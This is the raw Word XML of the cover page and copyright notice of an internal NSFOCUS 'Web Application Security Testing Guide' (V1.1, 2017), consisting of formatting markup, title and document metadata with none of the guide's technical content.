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B4D3A"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bookmarkStart w:id="0" w:name="_Toc423434663"/>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="305BA8B5"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4763FC33"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61CEFF33"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5D213D17"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5F3174F8"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0761313A"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36AA3D76"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724E4D49" w14:textId="2B77F5D4"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r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="341EA09B" wp14:editId="160424F1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400675" cy="247650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="8" name="图片 9" descr="说明: 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无标题-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E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:snapToGrid/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BA34118" wp14:editId="710519AC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400675" cy="247650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5" name="图片 9" descr="说明: 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无标题-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D402A3" w:rsidRPr="00F757E4" w14:paraId="2B3BFF4A" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:trPr>
          <w:trHeight w:val="236"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8520" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="single" w:sz="48" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E30A522" w14:textId="79AC40CB" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="004B712A" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:snapToGrid/>
                <w:sz w:val="52"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="52"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Web应用安全测试指南</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D402A3" w:rsidRPr="00F757E4" w14:paraId="5603D5E4" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:trPr>
          <w:trHeight w:val="236"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1222" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="48" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37BD9020" w14:textId="43A2AC32" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00983AD8" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA6BF2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文档编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2978" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="48" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E4EF815" w14:textId="3698F051" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00F75197" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ST-PEN-02-01-0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="48" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36904360" w14:textId="44BFA395" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00983AD8" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA6BF2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>密级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="48" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57759C8E" w14:textId="3FD7D58F" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="004B712A" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>内部</w:t>
            </w:r>
            <w:r w:rsidR="00E00817" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D402A3" w:rsidRPr="00F757E4" w14:paraId="68838B1F" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:trPr>
          <w:trHeight w:val="236"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1222" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3171A7" w14:textId="7EDF9467" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00983AD8" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA6BF2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>版本编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2978" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE20E1A" w14:textId="2594DCFB" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00D402A3" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V1.</w:t>
            </w:r>
            <w:r w:rsidR="006078A7" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E43CDCA" w14:textId="43B46169" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00983AD8" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA6BF2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D402A3" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3AB01F" w14:textId="4BF54E55" w:rsidR="00D402A3" w:rsidRPr="00F75197" w:rsidRDefault="00D402A3" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
            <w:r w:rsidR="00F75197" w:rsidRPr="00F75197">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-08-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="197D19C1"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6F51AD65"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2B75E2F2"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64901D14"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07B866D4"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484D8F55"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6280922F"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7974FAE6"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17CA43FE"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459F1342"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r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
          <w:noProof/>
          <w:snapToGrid/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BB6C14F" wp14:editId="5D22EE35">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3810000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>69215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1515745" cy="869950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6" name="图片 8" descr="说明: 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无标题-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965C"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183EF08F"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419F6D13"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D402A3" w:rsidRPr="00F757E4" w14:paraId="534D0E68" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C285B8E" w14:textId="77777777" w:rsidR="00D402A3" w:rsidRPr="00F757E4" w:rsidRDefault="00D402A3" w:rsidP="00106665">
            <w:pPr>
              <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="inside" w:y="121"/>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:suppressOverlap/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>©</w:t>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DATE  \@ "yyyy"  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000B549D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:noProof/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2019</w:t>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>绿盟科技</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D8877E4" w14:textId="38B07884" w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650C4541" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67F9A5"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25E1234F"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FC2B56" w:rsidRPr="00F757E4" w14:paraId="29996712" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4914449F" w14:textId="4B2E0828" w:rsidR="00FC2B56" w:rsidRPr="004846B0" w:rsidRDefault="006507C0" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B56" w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FC2B56" w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>版权声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w14:paraId="024B12CF" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8504" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D13F92C" w14:textId="7BB16B2F" w:rsidR="00FC2B56" w:rsidRPr="004846B0" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>本文中出现的任何文字叙述、文档格式、插图、照片、方法、过程等内容，除另有特别注明，版权均属</w:t>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>绿盟科技</w:t>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  Company  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>所有，受到有关产权及版权法保护。任何个人、机构未经</w:t>
            </w:r>
            <w:r w:rsidR="000B5DCB" w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>绿盟科技</w:t>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> DOCPROPERTY  Company  \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>的书面授权许可，不得以任何方式复制或引用本文的任何片断。</w:t>
            </w:r>
            <w:r w:rsidRPr="004846B0">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="151D5290"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20F51D1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766A6787"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6B129443"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42CEAFAC"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0E363187"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5016CBED"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159A32A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57968F5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4606699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7F0E2716"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tbl>
      <w:tblPr>
        <w:tblW w:w="8463"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985"/>
        <w:gridCol w:w="1156"/>
        <w:gridCol w:w="3522"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w14:paraId="2940CA23" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8463" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="5CFE77A5" w14:textId="1EEEAD61" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00B505CE" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>■</w:t>
            </w:r>
